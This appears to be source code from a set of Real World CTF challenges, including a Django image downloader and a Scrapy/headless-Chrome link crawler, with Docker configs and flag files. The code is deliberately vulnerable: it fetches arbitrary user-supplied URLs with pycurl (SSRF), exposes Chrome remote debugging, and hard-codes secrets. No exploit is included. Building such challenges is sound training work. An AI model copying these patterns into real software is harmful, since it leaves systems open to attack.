**kwargs): 19 | kwargs['imgs'] = self.request.session.get('imgs', []) 20 | 21 | return super().get_context_data(**kwargs) 22 | 23 | 24 | class DownloadRemote(ImgsMixin, generic.FormView): 25 | form_class = forms.ImageForm 26 | template_name = 'index.html' 27 | success_url = reverse_lazy('xremote:download') 28 | 29 | def download(self, url): 30 | try: 31 | c = pycurl.Curl() 32 | 33 | c.setopt(pycurl.URL, url) 34 | c.setopt(pycurl.TIMEOUT, 10) 35 | 36 | response = c.perform_rb() 37 | 38 | c.close() 39 | except pycurl.error: 40 | response = b'' 41 | 42 | return response 43 | 44 | def generate_path(self): 45 | path = os.path.join(settings.MEDIA_ROOT, dateformat.format(timezone.now(), 'Y/m/d')) 46 | 47 | if not os.path.exists(path): 48 | os.makedirs(path, 0o755) 49 | return os.path.join(path, str(uuid.uuid4())) 50 | 51 | @transaction.atomic 52 | def form_valid(self, form): 53 | url = form.cleaned_data['url'] 54 | response = self.download(url) 55 | path = self.generate_path() 56 | 57 | if response: 58 | with open(path, 'wb') as f: 59 | f.write(response) 60 | 61 | url = path[len(settings.MEDIA_ROOT)+1:] 62 | models.Image.objects.create(path=url) 63 | if 'imgs' not in self.request.session: 64 | self.request.session['imgs'] = [] 65 | self.request.session['imgs'].append(url) 66 | 67 | self.request.session.modified = True 68 | 69 | return HttpResponseRedirect(self.get_success_url()) 70 | -------------------------------------------------------------------------------- /2018/magic_tunnel/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | services: 3 | web: 4 | build: . 5 | volumes: 6 | - ./files/static:/usr/src/rwctf/static 7 | - ./files/media:/usr/src/rwctf/media 8 | environment: 9 | - DEBUG=false 10 | - SECRET_KEY=q9FPF3XBb9Bru5tF5yG8K2kGNq7Uf7Ng39wG 11 | - LOG_PATH=/tmp/error.log 12 | - "DATABASE_URL=postgres://postgres:DNBe42SxW6rb@db:5432/rwctf" 13 | depends_on: 14 | - db 15 | nginx: 16 | image: nginx:1-alpine 17 | volumes: 18 | - ./nginx/rwctf.conf:/etc/nginx/conf.d/rwctf.conf 19 | - ./files:/data 20 | ports: 21 | - "8080:8080" 22 | depends_on: 23 | - web 24 | db: 25 | image: postgres:10-alpine 26 | environment: 27 | - POSTGRES_PASSWORD=DNBe42SxW6rb 28 | - POSTGRES_DB=rwctf 29 | -------------------------------------------------------------------------------- /2018/magic_tunnel/files/media/.gitkeep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phith0n/realworldctf/6035cb32a773d28750fbadf2cdab6ac00feafa2c/2018/magic_tunnel/files/media/.gitkeep -------------------------------------------------------------------------------- /2018/magic_tunnel/files/static/.gitkeep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phith0n/realworldctf/6035cb32a773d28750fbadf2cdab6ac00feafa2c/2018/magic_tunnel/files/static/.gitkeep -------------------------------------------------------------------------------- /2018/magic_tunnel/flag/flag: -------------------------------------------------------------------------------- 1 | rwctf{How_1_sample@SSRF!cha11enge} -------------------------------------------------------------------------------- /2018/magic_tunnel/flag/readflag.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main () { 4 | FILE *fp; 5 | char buff[255]; 6 | 7 | fp = fopen("/flag", "r"); 8 | fgets(buff, 255, fp); 9 | fclose(fp); 10 | 11 | printf("flag: %s\n", buff); 12 | 13 | return 0; 14 | } -------------------------------------------------------------------------------- /2018/magic_tunnel/nginx/rwctf.conf: -------------------------------------------------------------------------------- 1 | upstream django { 2 | # server unix:///path/to/your/mysite/mysite.sock; # for a file socket 3 | server web:8000; # for a web port socket (we'll use this first) 4 | } 5 | 6 | # configuration of the server 7 | server { 8 | # the port your site will be served on 9 | listen 8080; 10 | # the domain name it will serve for 11 | server_name localhost; # substitute your machine's IP address or FQDN 12 | charset utf-8; 13 | 14 | # max upload size 15 | client_max_body_size 2M; # adjust to taste 16 | 17 | # Django media 18 | location /media/ { 19 | alias /data/media/; # your Django project's media files - amend as required 20 | } 21 | 22 | location /static/ { 23 | alias /data/static/; # your Django project's static files - amend as required 24 | } 25 | 26 | # Finally, send all non-media requests to the Django server. 27 | location / { 28 | uwsgi_pass django; 29 | include /etc/nginx/uwsgi_params; # the uwsgi_params file you installed 30 | } 31 | } -------------------------------------------------------------------------------- /2018/magic_tunnel/requirements.txt: -------------------------------------------------------------------------------- 1 | Django 2 | pycurl 3 | pytz 4 | uwsgi 5 | dj-database-url 6 | psycopg2 -------------------------------------------------------------------------------- /2019/crawlbox/.gitignore: -------------------------------------------------------------------------------- 1 | /scrapyd/ 2 | /env/ 3 | *.egg-info 4 | build/ 5 | *.egg 6 | *.pyc 7 | __pycache__ 8 | /.idea/ -------------------------------------------------------------------------------- /2019/crawlbox/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM phusion/baseimage:master 2 | 3 | LABEL maintainer="phith0n " 4 | 5 | RUN set -ex \ 6 | && apt-get update \ 7 | && apt-get install -y --no-install-recommends python3 python3-distutils gdebi-core wget curl ca-certificates xz-utils unzip wait-for-it \ 8 | && cd /tmp \ 9 | && wget -q https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb \ 10 | && gdebi -n google-chrome-stable_current_amd64.deb \ 11 | && rm -rf /tmp/google-chrome-stable_current_amd64.deb /var/lib/apt/lists/* 12 | 13 | RUN set -ex \ 14 | && curl -s https://bootstrap.pypa.io/get-pip.py | python3 \ 15 | && pip install -U flask scrapy selenium scrapyd scrapyd-client gunicorn gevent validators redis requests pyppeteer \ 16 | && mkdir -p /etc/service/scrapyd /etc/service/chromedriver /etc/service/flask /opt/scrapyd 17 | 18 | ADD docker/scrapyd.conf /opt/scrapyd/scrapyd.conf 19 | ADD docker/scrapyd.sh /etc/service/scrapyd/run 20 | ADD docker/chromedriver.sh /etc/service/chromedriver/run 21 | ADD docker/flask.sh /etc/service/flask/run 22 | 23 | RUN set -ex \ 24 | && chmod +x /etc/service/scrapyd/run /etc/service/chromedriver/run /etc/service/flask/run \ 25 | && groupadd chrome \ 26 | && useradd chrome -d /home/chrome -m -g chrome -s /bin/bash \ 27 | && groupadd scrapy \ 28 | && useradd scrapy -M -s /sbin/nologin -g scrapy \ 29 | && mkdir -p /opt/scrapyd/dbs /opt/scrapyd/eggs \ 30 | && chown scrapy:scrapy -R /opt/scrapyd 31 | 32 | EXPOSE 8001 33 | ADD docker/flag_uBd20U0zp1uk / 34 | -------------------------------------------------------------------------------- /2019/crawlbox/README.md: -------------------------------------------------------------------------------- 1 | # Real World CTF 2019 Quals - CrawlBox 2 | 3 | This is my first challenge for the Real World CTF 2019. 4 | -------------------------------------------------------------------------------- /2019/crawlbox/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '2.4' 2 | services: 3 | web: 4 | build: . 5 | depends_on: 6 | - redis 7 | volumes: 8 | - ./web:/usr/src/web 9 | - ./webpage:/usr/src/webpage 10 | - ./docker/control.py:/opt/control.py 11 | cap_add: 12 | - SYS_ADMIN 13 | restart: always 14 | # cpus: '1.2' 15 | # mem_limit: 5G 16 | redis: 17 | image: redis:alpine 18 | command: redis-server /usr/local/etc/redis/redis.conf 19 | volumes: 20 | - ./docker/redis.conf:/usr/local/etc/redis/redis.conf 21 | restart: always 22 | nginx: 23 | image: nginx:alpine 24 | ports: 25 | - "45818:80" 26 | volumes: 27 | - ./docker/nginx-www.conf:/etc/nginx/conf.d/default.conf 28 | depends_on: 29 | - web 30 | restart: always 31 | -------------------------------------------------------------------------------- /2019/crawlbox/docker/chromedriver.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | setuser chrome google-chrome --remote-debugging-port=21218 \ 4 | --disable-background-networking --disable-background-timer-throttling --disable-breakpad \ 5 | --disable-browser-side-navigation --disable-client-side-phishing-detection --disable-default-apps \ 6 | --disable-dev-shm-usage --disable-extensions --disable-features=site-per-process --disable-hang-monitor \ 7 | --disable-popup-blocking --disable-prompt-on-repost --disable-sync --disable-translate --metrics-recording-only \ 8 | --no-first-run --safebrowsing-disable-auto-update --enable-automation --password-store=basic \ 9 | --use-mock-keychain --headless --hide-scrollbars --mute-audio --disable-gpu \ 10 | --user-agent="Scrapy/ChromeHeadless (+https://scrapy.org)" 11 | -------------------------------------------------------------------------------- /2019/crawlbox/docker/control.py: -------------------------------------------------------------------------------- 1 | import asyncio 2 | import argparse 3 | import requests 4 | from pyppeteer import connect 5 | from pyppeteer.browser import Browser 6 | from pyppeteer.page import Page 7 | 8 | loop = asyncio.get_event_loop() 9 | base = 'http://127.0.0.1:21218' 10 | data = requests.get(f'{base}/json/version').json() 11 | 12 | browser: Browser = loop.run_until_complete(connect(browserWSEndpoint=data['webSocketDebuggerUrl'], logLevel='WARNING')) 13 | 14 | 15 | async def show_tabs_command(): 16 | for tab in await browser.pages(): 17 | print('%r, %r' % (tab.url, await tab.title())) 18 | 19 | 20 | async def page_source_command(): 21 | for tab in await browser.pages(): 22 | print('%r' % tab.url) 23 | print('%r' % await tab.content()) 24 | print('\n==============================\n') 25 | 26 | 27 | async def main(): 28 | parser = argparse.ArgumentParser(description='Control RWCTF Crawlbox Game.') 29 | subcommands = parser.add_subparsers(dest='command_name') 30 | subcommands.add_parser('show_tabs') 31 | subcommands.add_parser('page_source') 32 | kwargs = parser.parse_args() 33 | 34 | if getattr(kwargs, 'command_name', ''): 35 | func = getattr(kwargs, 'command_name') + '_command' 36 | await globals()[func]() 37 | 38 | await browser.disconnect() 39 | 40 | 41 | if __name__ == '__main__': 42 | loop.run_until_complete(main()) 43 | -------------------------------------------------------------------------------- /2019/crawlbox/docker/flag_uBd20U0zp1uk: -------------------------------------------------------------------------------- 1 | rwctf{97053f58121d36499788117b60472e9c} -------------------------------------------------------------------------------- /2019/crawlbox/docker/flask.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | wait-for-it 127.0.0.1:6800 -- echo "scrapyd is up" 4 | if [[ $(curl -s http://127.0.0.1:6800/listprojects.json | grep "webpage") == "" ]]; then 5 | cd /usr/src/webpage 6 | scrapyd-deploy webpage -p webpage_1o24 7 | fi 8 | 9 | cd /usr/src/web 10 | gunicorn app:app --chdir=/usr/src/web -w 4 -k gevent -u nobody -g nogroup -b 0.0.0.0:8001 11 | -------------------------------------------------------------------------------- /2019/crawlbox/docker/nginx-www.conf: -------------------------------------------------------------------------------- 1 | server { 2 | listen 80; 3 | server_name localhost; 4 | root /usr/share/nginx/html; 5 | index index.html; 6 | charset utf-8; 7 | 8 | location / { 9 | proxy_pass http://web:8001; 10 | proxy_set_header Host $host:45818; 11 | proxy_set_header X-Forwarded-For $remote_addr; 12 | } 13 | 14 | location ~ /\. { 15 | deny all; 16 | } 17 | } -------------------------------------------------------------------------------- /2019/crawlbox/docker/redis.conf: -------------------------------------------------------------------------------- 1 | requirepass QzFs0WGD3koT 2 | rename-command CONFIG "" 3 | -------------------------------------------------------------------------------- /2019/crawlbox/docker/scrapyd.conf: -------------------------------------------------------------------------------- 1 | [scrapyd] 2 | eggs_dir = eggs 3 | logs_dir = logs 4 | items_dir = 5 | jobs_to_keep = 5 6 | dbs_dir = dbs 7 | max_proc = 0 8 | max_proc_per_cpu = 4 9 | finished_to_keep = 100 10 | poll_interval = 5.0 11 | bind_address = 127.0.0.1 12 | http_port = 6800 13 | debug = off 14 | runner = scrapyd.runner 15 | application = scrapyd.app.application 16 | launcher = scrapyd.launcher.Launcher 17 | webroot = scrapyd.website.Root 18 | 19 | [services] 20 | schedule.json = scrapyd.webservice.Schedule 21 | cancel.json = scrapyd.webservice.Cancel 22 | addversion.json = scrapyd.webservice.AddVersion 23 | listprojects.json = scrapyd.webservice.ListProjects 24 | listversions.json = scrapyd.webservice.ListVersions 25 | listspiders.json = scrapyd.webservice.ListSpiders 26 | delproject.json = scrapyd.webservice.DeleteProject 27 | delversion.json = scrapyd.webservice.DeleteVersion 28 | listjobs.json = scrapyd.webservice.ListJobs 29 | daemonstatus.json = scrapyd.webservice.DaemonStatus -------------------------------------------------------------------------------- /2019/crawlbox/docker/scrapyd.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | cd /opt/scrapyd 4 | scrapyd -u scrapy -g scrapy 5 | -------------------------------------------------------------------------------- /2019/crawlbox/requirements.txt: -------------------------------------------------------------------------------- 1 | flask 2 | scrapy 3 | selenium 4 | scrapyd 5 | scrapyd-client 6 | gunicorn 7 | gevent 8 | validators 9 | redis -------------------------------------------------------------------------------- /2019/crawlbox/web/app.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import flask 3 | import redis 4 | import validators 5 | import functools 6 | from flask import Flask, request 7 | from logging.config import dictConfig 8 | 9 | dictConfig({ 10 | 'version': 1, 11 | 'formatters': {'default': { 12 | 'format': '[%(asctime)s] %(levelname)s in %(module)s: %(message)s', 13 | }}, 14 | 'handlers': {'wsgi': { 15 | 'class': 'logging.StreamHandler', 16 | 'stream': 'ext://flask.logging.wsgi_errors_stream', 17 | 'formatter': 'default' 18 | }}, 19 | 'root': { 20 | 'level': 'INFO', 21 | 'handlers': ['wsgi'] 22 | } 23 | }) 24 | app = Flask(__name__) 25 | app.secret_key = 'E%g5r%J7wE73' 26 | rdb = redis.from_url('redis://:QzFs0WGD3koT@redis:6379/0') 27 | base = 'http://127.0.0.1:6800' 28 | 29 | 30 | def get_ipaddress(request: flask.Request): 31 | return request.headers.get("x-forwarded-for", request.remote_addr) 32 | 33 | 34 | def check_throttle(func): 35 | @functools.wraps(func) 36 | def view(*args, **kwargs): 37 | ip_address = get_ipaddress(flask.request) 38 | if flask.request.method != 'POST': 39 | return func(*args, **kwargs) 40 | 41 | if rdb.get(ip_address) is None: 42 | rdb.set(ip_address, 1, ex=10) 43 | return func(*args, **kwargs) 44 | else: 45 | flask.flash('Your request is too frequent', 'warning') 46 | return flask.redirect(flask.url_for('index')) 47 | 48 | return view 49 | 50 | 51 | def get_links(base): 52 | links = rdb.smembers(base) 53 | return [link.decode() for link in links] 54 | 55 | 56 | @app.route('/', methods=['GET', 'POST']) 57 | @check_throttle 58 | def index(): 59 | if request.method != 'POST': 60 | url = flask.session.get('url', '') 61 | links = get_links(url) if url else set() 62 | return flask.render_template('index.html', links=links) 63 | 64 | url = request.form.get("url", "") 65 | if not validators.url(url, public=True): 66 | flask.flash('URL is error', 'danger') 67 | return flask.redirect(flask.url_for('index')) 68 | 69 | flask.session['url'] = url 70 | try: 71 | app.logger.info('crawl for %s', url) 72 | response = requests.post(f'{base}/schedule.json', data={ 73 | 'project': 'webpage_1o24', 74 | 'spider': 'page', 75 | 'url': url 76 | }) 77 | if response.status_code == 200: 78 | data = response.json() 79 | if data.get('status', '') == 'ok': 80 | flask.flash('Waiting for crawling then refreshing the page to get results...', 'success') 81 | return flask.redirect(flask.url_for('index')) 82 | except Exception as e: 83 | app.logger.warning('request %s/schedule.json failed, exception %s', base, str(e)) 84 | 85 | flask.flash('Crawling fail...', 'danger') 86 | return flask.redirect(flask.url_for('index')) 87 | 88 | 89 | if __name__ == '__main__': 90 | app.run() 91 | -------------------------------------------------------------------------------- /2019/crawlbox/web/templates/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | Crawl Box 12 | 13 | 14 |
15 |
16 |
17 |

Use crawlbox to get all links from a page

18 |
19 |
20 |
21 |
22 | {% with messages = get_flashed_messages(with_categories=true) %} 23 | {% if messages %} 24 | {% for category, message in messages %} 25 | 26 | {% endfor %} 27 | {% endif %} 28 | {% endwith %} 29 |
30 |
31 | 32 |
33 | 34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 | 42 | 43 | {% for link in links %} 44 | 45 | {% endfor %} 46 |
#Link
{{ loop.index }}{{ link }}
47 |
48 |
49 |
50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | -------------------------------------------------------------------------------- /2019/crawlbox/webpage/scrapy.cfg: -------------------------------------------------------------------------------- 1 | # Automatically created by: scrapy startproject 2 | # 3 | # For more information about the [deploy] section see: 4 | # https://scrapyd.readthedocs.io/en/latest/deploy.html 5 | 6 | [settings] 7 | default = webpage.settings 8 | 9 | [deploy:webpage] 10 | url = http://localhost:6800/ 11 | project = webpage_1o24 12 | -------------------------------------------------------------------------------- /2019/crawlbox/webpage/setup.py: -------------------------------------------------------------------------------- 1 | # Automatically created by: scrapyd-deploy 2 | from setuptools import setup, find_packages 3 | 4 | 5 | setup( 6 | name = 'project', 7 | version = '1.0', 8 | packages = find_packages(), 9 | entry_points = {'scrapy': ['settings = webpage.settings']}, 10 | ) 11 | -------------------------------------------------------------------------------- /2019/crawlbox/webpage/webpage/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phith0n/realworldctf/6035cb32a773d28750fbadf2cdab6ac00feafa2c/2019/crawlbox/webpage/webpage/__init__.py -------------------------------------------------------------------------------- /2019/crawlbox/webpage/webpage/items.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | # Define here the models for your scraped items 4 | # 5 | # See documentation in: 6 | # https://docs.scrapy.org/en/latest/topics/items.html 7 | 8 | import scrapy 9 | 10 | 11 | class LinkItem(scrapy.Item): 12 | base = scrapy.Field() 13 | link = scrapy.Field() 14 | -------------------------------------------------------------------------------- /2019/crawlbox/webpage/webpage/middlewares.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | # Define here the models for your spider middleware 4 | # 5 | # See documentation in: 6 | # https://docs.scrapy.org/en/latest/topics/spider-middleware.html 7 | 8 | import requests 9 | import asyncio 10 | from scrapy import signals 11 | from pyppeteer import connect 12 | from pyppeteer.page import Page 13 | from scrapy.http import Request, HtmlResponse 14 | 15 | 16 | DEFAULT_ARGS = [ 17 | '--disable-background-networking', 18 | '--disable-background-timer-throttling', 19 | '--disable-breakpad', 20 | '--disable-browser-side-navigation', 21 | '--disable-client-side-phishing-detection', 22 | '--disable-default-apps', 23 | '--disable-dev-shm-usage', 24 | '--disable-extensions', 25 | '--disable-features=site-per-process', 26 | '--disable-hang-monitor', 27 | '--disable-popup-blocking', 28 | '--disable-prompt-on-repost', 29 | '--disable-sync', 30 | '--disable-translate', 31 | '--metrics-recording-only', 32 | '--no-first-run', 33 | '--safebrowsing-disable-auto-update', 34 | '--enable-automation', 35 | '--password-store=basic', 36 | '--use-mock-keychain', 37 | '--headless', 38 | '--hide-scrollbars', 39 | '--mute-audio', 40 | '--no-sandbox', 41 | '--disable-gpu', 42 | ] 43 | loop = asyncio.get_event_loop() 44 | 45 | 46 | class WebpageSpiderMiddleware(object): 47 | # Not all methods need to be defined. If a method is not defined, 48 | # scrapy acts as if the spider middleware does not modify the 49 | # passed objects. 50 | 51 | @classmethod 52 | def from_crawler(cls, crawler): 53 | # This method is used by Scrapy to create your spiders. 54 | s = cls() 55 | crawler.signals.connect(s.spider_opened, signal=signals.spider_opened) 56 | return s 57 | 58 | def process_spider_input(self, response, spider): 59 | # Called for each response that goes through the spider 60 | # middleware and into the spider. 61 | 62 | # Should return None or raise an exception. 63 | return None 64 | 65 | def process_spider_output(self, response, result, spider): 66 | # Called with the results returned from the Spider, after 67 | # it has processed the response. 68 | 69 | # Must return an iterable of Request, dict or Item objects. 70 | for i in result: 71 | yield i 72 | 73 | def process_spider_exception(self, response, exception, spider): 74 | # Called when a spider or process_spider_input() method 75 | # (from other spider middleware) raises an exception. 76 | 77 | # Should return either None or an iterable of Request, dict 78 | # or Item objects. 79 | pass 80 | 81 | def process_start_requests(self, start_requests, spider): 82 | # Called with the start requests of the spider, and works 83 | # similarly to the process_spider_output() method, except 84 | # that it doesn’t have a response associated. 85 | 86 | # Must return only requests (not items). 87 | for r in start_requests: 88 | yield r 89 | 90 | def spider_opened(self, spider): 91 | spider.logger.info('Spider opened: %s' % spider.name) 92 | 93 | 94 | class BrowserMiddleware(object): 95 | def __init__(self): 96 | # option = webdriver.ChromeOptions() 97 | # for arg in DEFAULT_ARGS: 98 | # option.add_argument(arg) 99 | # self.browser = webdriver.Remote( 100 | # command_executor=ChromeRemoteConnection( 101 | # remote_server_addr='http://127.0.0.1:48192', 102 | # keep_alive=True 103 | # ), 104 | # desired_capabilities=option.to_capabilities() 105 | # ) 106 | base = 'http://127.0.0.1:21218' 107 | data = requests.get(f'{base}/json/version').json() 108 | 109 | self.browser = loop.run_until_complete(connect(browserWSEndpoint=data['webSocketDebuggerUrl'], logLevel='WARNING')) 110 | 111 | @classmethod 112 | def from_crawler(cls, crawler): 113 | # This method is used by Scrapy to create your spiders. 114 | s = cls() 115 | crawler.signals.connect(s.spider_opened, signal=signals.spider_opened) 116 | crawler.signals.connect(s.spider_closed, signal=signals.spider_closed) 117 | return s 118 | 119 | async def request_url(self, url): 120 | page: Page = await self.browser.newPage() 121 | await page.goto(url) 122 | await asyncio.sleep(5) 123 | data = await page.content() 124 | await page.close() 125 | return data 126 | 127 | def process_request(self, request, spider): 128 | data = loop.run_until_complete(self.request_url(request.url)) 129 | 130 | return HtmlResponse(url=request.url, body=data.encode(), request=request, encoding='utf-8') 131 | 132 | def process_response(self, request, response, spider): 133 | return response 134 | 135 | def process_exception(self, request, exception, spider): 136 | pass 137 | 138 | def spider_opened(self, spider): 139 | spider.logger.info('Spider opened: %s' % spider.name) 140 | 141 | def spider_closed(self, spider, reason): 142 | spider.logger.info('Close browser') 143 | # self.browser.quit() 144 | -------------------------------------------------------------------------------- /2019/crawlbox/webpage/webpage/pipelines.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | # Define your item pipelines here 4 | # 5 | # Don't forget to add your pipeline to the ITEM_PIPELINES setting 6 | # See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html 7 | import redis 8 | 9 | 10 | class WebpagePipeline(object): 11 | def __init__(self, redis_url): 12 | self.redis_url = redis_url 13 | 14 | @classmethod 15 | def from_crawler(cls, crawler): 16 | return cls(redis_url=crawler.settings.get('REDIS_URL')) 17 | 18 | def open_spider(self, spider): 19 | self.redis = redis.from_url(self.redis_url) 20 | 21 | def close_spider(self, spider): 22 | self.redis.close() 23 | 24 | def process_item(self, item, spider): 25 | self.redis.sadd(item['base'], item['link']) 26 | return item 27 | -------------------------------------------------------------------------------- /2019/crawlbox/webpage/webpage/settings.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | # Scrapy settings for webpage project 4 | # 5 | # For simplicity, this file contains only settings considered important or 6 | # commonly used. You can find more settings consulting the documentation: 7 | # 8 | # https://docs.scrapy.org/en/latest/topics/settings.html 9 | # https://docs.scrapy.org/en/latest/topics/downloader-middleware.html 10 | # https://docs.scrapy.org/en/latest/topics/spider-middleware.html 11 | 12 | BOT_NAME = 'webpage' 13 | 14 | SPIDER_MODULES = ['webpage.spiders'] 15 | NEWSPIDER_MODULE = 'webpage.spiders' 16 | 17 | 18 | # Crawl responsibly by identifying yourself (and your website) on the user-agent 19 | #USER_AGENT = 'webpage (+http://www.yourdomain.com)' 20 | 21 | # Obey robots.txt rules 22 | ROBOTSTXT_OBEY = False 23 | 24 | # Configure maximum concurrent requests performed by Scrapy (default: 16) 25 | #CONCURRENT_REQUESTS = 32 26 | 27 | # Configure a delay for requests for the same website (default: 0) 28 | # See https://docs.scrapy.org/en/latest/topics/settings.html#download-delay 29 | # See also autothrottle settings and docs 30 | #DOWNLOAD_DELAY = 3 31 | # The download delay setting will honor only one of: 32 | #CONCURRENT_REQUESTS_PER_DOMAIN = 16 33 | #CONCURRENT_REQUESTS_PER_IP = 16 34 | 35 | # Disable cookies (enabled by default) 36 | #COOKIES_ENABLED = False 37 | 38 | # Disable Telnet Console (enabled by default) 39 | #TELNETCONSOLE_ENABLED = False 40 | 41 | # Override the default request headers: 42 | #DEFAULT_REQUEST_HEADERS = { 43 | # 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 44 | # 'Accept-Language': 'en', 45 | #} 46 | 47 | # Enable or disable spider middlewares 48 | # See https://docs.scrapy.org/en/latest/topics/spider-middleware.html 49 | #SPIDER_MIDDLEWARES = { 50 | # 'webpage.middlewares.WebpageSpiderMiddleware': 543, 51 | #} 52 | 53 | # Enable or disable downloader middlewares 54 | # See https://docs.scrapy.org/en/latest/topics/downloader-middleware.html 55 | DOWNLOADER_MIDDLEWARES = { 56 | 'scrapy.downloadermiddlewares.robotstxt.RobotsTxtMiddleware': None, 57 | 'scrapy.downloadermiddlewares.ajaxcrawl.AjaxCrawlMiddleware': None, 58 | 'webpage.middlewares.BrowserMiddleware': 543, 59 | } 60 | 61 | DOWNLOAD_HANDLERS = { 62 | 'file': None, 63 | 's3': None, 64 | 'ftp': None, 65 | } 66 | 67 | # Enable or disable extensions 68 | # See https://docs.scrapy.org/en/latest/topics/extensions.html 69 | #EXTENSIONS = { 70 | # 'scrapy.extensions.telnet.TelnetConsole': None, 71 | #} 72 | 73 | # Configure item pipelines 74 | # See https://docs.scrapy.org/en/latest/topics/item-pipeline.html 75 | ITEM_PIPELINES = { 76 | 'webpage.pipelines.WebpagePipeline': 300, 77 | } 78 | 79 | # Enable and configure the AutoThrottle extension (disabled by default) 80 | # See https://docs.scrapy.org/en/latest/topics/autothrottle.html 81 | #AUTOTHROTTLE_ENABLED = True 82 | # The initial download delay 83 | #AUTOTHROTTLE_START_DELAY = 5 84 | # The maximum download delay to be set in case of high latencies 85 | #AUTOTHROTTLE_MAX_DELAY = 60 86 | # The average number of requests Scrapy should be sending in parallel to 87 | # each remote server 88 | #AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0 89 | # Enable showing throttling stats for every response received: 90 | #AUTOTHROTTLE_DEBUG = False 91 | 92 | # Enable and configure HTTP caching (disabled by default) 93 | # See https://docs.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings 94 | #HTTPCACHE_ENABLED = True 95 | #HTTPCACHE_EXPIRATION_SECS = 0 96 | #HTTPCACHE_DIR = 'httpcache' 97 | #HTTPCACHE_IGNORE_HTTP_CODES = [] 98 | #HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage' 99 | 100 | REDIS_URL = 'redis://:QzFs0WGD3koT@redis:6379/0' 101 | -------------------------------------------------------------------------------- /2019/crawlbox/webpage/webpage/spiders/__init__.py: -------------------------------------------------------------------------------- 1 | # This package will contain the spiders of your Scrapy project 2 | # 3 | # Please refer to the documentation for information on how to create and manage 4 | # your spiders. 5 | -------------------------------------------------------------------------------- /2019/crawlbox/webpage/webpage/spiders/page.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import scrapy 3 | from ..items import LinkItem 4 | 5 | 6 | class PageSpider(scrapy.Spider): 7 | name = 'page' 8 | 9 | def start_requests(self): 10 | url = getattr(self, 'url', 'http://example.com') 11 | 12 | yield scrapy.Request(url) 13 | 14 | def parse(self, response: scrapy.http.Response): 15 | for query in response.css('a'): 16 | if 'href' in query.attrib: 17 | yield LinkItem(base=response.url, link=query.attrib['href']) 18 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # My Real World CTF Challenges 2 | 3 | This is my Real World CTF Challenges source code: 4 | 5 | - [Real World CTF 2018 Quals - Bookhub](2018/bookhub) 6 | - [Real World CTF 2018 Finals - Magic_Tunnel](2018/magic_tunnel) 7 | - [Real World CTF 2019 Quals - CrawlBox](2019/crawlbox) 8 | 9 | Just walk into the directory and `docker-compose up -d`. 10 | --------------------------------------------------------------------------------